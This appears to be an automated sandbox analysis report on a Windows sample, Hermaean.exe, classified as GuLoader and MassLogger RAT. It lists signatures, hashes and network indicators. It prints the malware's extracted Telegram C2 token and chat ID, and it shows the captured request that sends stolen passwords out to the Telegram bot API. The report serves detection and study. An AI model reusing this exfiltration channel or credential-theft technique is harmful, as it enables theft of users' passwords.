
Windows Analysis Report
Hermaean.exe

Overview

General Information

Sample name: Hermaean.exe
Analysis ID: 1617009
MD5: a5350eaa7864ac06277c445e0f52f9d9
SHA1: 9a589f6dcbb0ee908a1665501b3e249a00c05db8
SHA256: eab16fb9a96dba4a00c074dec9d6be01b5d93b680d69d230c21497fce96f9de5
Tags: exe, user-adrian__luca

Detection

GuLoader, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Hermaean.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\Hermaean.exe" MD5: A5350EAA7864AC06277C445E0F52F9D9)
    • Hermaean.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\Hermaean.exe" MD5: A5350EAA7864AC06277C445E0F52F9D9)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY", "Telegram Chatid": "6900395692"}
Source | Rule | Description | Author
00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.2244389028.00000000053A2000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: Hermaean.exe PID: 3436 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-17T12:43:34.089086+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49912 | 149.154.167.220 | 443 | TCP
2025-02-17T12:43:26.526487+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49864 | 132.226.247.73 | 80 | TCP
2025-02-17T12:43:33.089059+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49864 | 132.226.247.73 | 80 | TCP
2025-02-17T12:43:20.434018+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49823 | 216.58.206.78 | 443 | TCP
2025-02-17T12:43:33.783477+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.8 | 49912 | 149.154.167.220 | 443 | TCP

            AV Detection

Source: 00000006.00000002.3012907907.0000000035475000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY", "Telegram Chatid": "6900395692"}
Source: Hermaean.exe.2920.6.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendMessage"}
Source: Hermaean.exe | Virustotal: Detection: 72%
Source: Hermaean.exe | ReversingLabs: Detection: 62%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35002270 CryptUnprotectData
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_35002990 CryptUnprotectData
Source: Hermaean.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49871 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.8:49823 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.8:49833 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49912 version: TLS 1.2
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_0040276E FindFirstFileW
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_0040622B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_0040276E FindFirstFileW
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_0040622B FindFirstFileW,FindClose

            Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49912 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49912 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900395692&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd4f1e65439e8e
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.32.1
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49864 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49823 -> 216.58.206.78:443
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1du6OhkwMOVgv695pSCJPeCEIGpQS3l7K&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot8064131224:AAFmNYMbo3lhB_qXAgZHNTpxwkQ6BCP9UWY/sendDocument?chat_id=6900395692&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd4f1e65439e8e
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown | Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\Hermaean.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_00403358 EntryPoint,LdrInitializeThunk,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350004986_2_35000498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350040986_2_35004098
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35009CA06_2_35009CA0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350040A86_2_350040A8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E4C06_2_3500E4C0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C0CA6_2_3500C0CA
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500E4D06_2_3500E4D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500C0D86_2_3500C0D8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350008DF6_2_350008DF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350008F06_2_350008F0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350044F06_2_350044F0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AB106_2_3500AB10
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AB206_2_3500AB20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002F386_2_35002F38
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002F486_2_35002F48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AF686_2_3500AF68
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500AF786_2_3500AF78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350033926_2_35003392
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350033A06_2_350033A0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B3C16_2_3500B3C1
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500B3D06_2_3500B3D0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350037E86_2_350037E8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_350037F86_2_350037F8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F6206_2_3500F620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D22E6_2_3500D22E
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500F6306_2_3500F630
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D2386_2_3500D238
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A2616_2_3500A261
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A2706_2_3500A270
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500FA786_2_3500FA78
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D6826_2_3500D682
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500FA886_2_3500FA88
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500D6906_2_3500D690
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A6B96_2_3500A6B9
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3500A6C86_2_3500A6C8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002AE06_2_35002AE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35002AF06_2_35002AF0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353016206_2_35301620
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353033306_2_35303330
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353039806_2_35303980
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530981C6_2_3530981C
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026986_2_35302698
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35302CE06_2_35302CE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35304E486_2_35304E48
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35304AE06_2_35304AE0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353016106_2_35301610
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353033206_2_35303320
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35303FEF6_2_35303FEF
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353039746_2_35303974
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530B8306_2_3530B830
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530B8506_2_3530B850
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353004986_2_35300498
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_3530048A6_2_3530048A
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026186_2_35302618
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353026876_2_35302687
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353000126_2_35300012
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353040006_2_35304000
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_353000406_2_35300040
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35302CD06_2_35302CD0
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_35300B206_2_35300B20
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DBED86_2_385DBED8
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DDE706_2_385DDE70
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DDE606_2_385DDE60
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385D5E306_2_385D5E30
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: 6_2_385DD0886_2_385DD088
            Source: C:\Users\user\Desktop\Hermaean.exeCode function: String function: 00402B38 appears 45 times
            Source: Hermaean.exe, 00000001.00000000.1727753600.000000000044D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.3012470259.0000000034F77000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.2987894043.000000000044D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exe, 00000006.00000002.2992279228.0000000004C22000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Hermaean.exe
            Source: Hermaean.exe | Binary or memory string: OriginalFilenametoggler triumvirates.exe4 vs Hermaean.exe
            Source: Hermaean.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/30@5/5
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_004045C8 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne
            Source: C:\Users\user\Desktop\Hermaean.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\Hermaean.exe | File created: C:\Users\user\AppData\Local\Temp\nsjA4ED.tmp
            Source: Hermaean.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Hermaean.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Hermaean.exe, 00000006.00000002.3012907907.0000000035432000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.00000000353FF000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003540F000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003541D000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3013818253.000000003634D000.00000004.00000800.00020000.00000000.sdmp, Hermaean.exe, 00000006.00000002.3012907907.000000003543E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Hermaean.exe | Virustotal: Detection: 72%
            Source: Hermaean.exe | ReversingLabs: Detection: 62%
            Source: C:\Users\user\Desktop\Hermaean.exe | File read: C:\Users\user\Desktop\Hermaean.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: C:\Users\user\Desktop\Hermaean.exe | Process created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: C:\Users\user\Desktop\Hermaean.exe | Process created: C:\Users\user\Desktop\Hermaean.exe "C:\Users\user\Desktop\Hermaean.exe"
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\Hermaean.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Hermaean.exe | File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\Udgyd.ini
            Source: C:\Users\user\Desktop\Hermaean.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Hermaean.exe | Static file information: File size 1070325 > 1048576

            Data Obfuscation

            Source: Yara match | File source: Process Memory Space: Hermaean.exe PID: 3436, type: MEMORYSTR
            Source: Yara match | File source: 00000001.00000002.2244389028.00000000053A2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 1_2_10002DB0 push eax; ret 1_2_10002DDE
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_049D6FC0 push 8BF88B6Eh; iretd 6_2_049D6FC7
            Source: C:\Users\user\Desktop\Hermaean.exe | Code function: 6_2_049D68F5 push 8BF88B6Eh; iretd 6_2_049D68FC
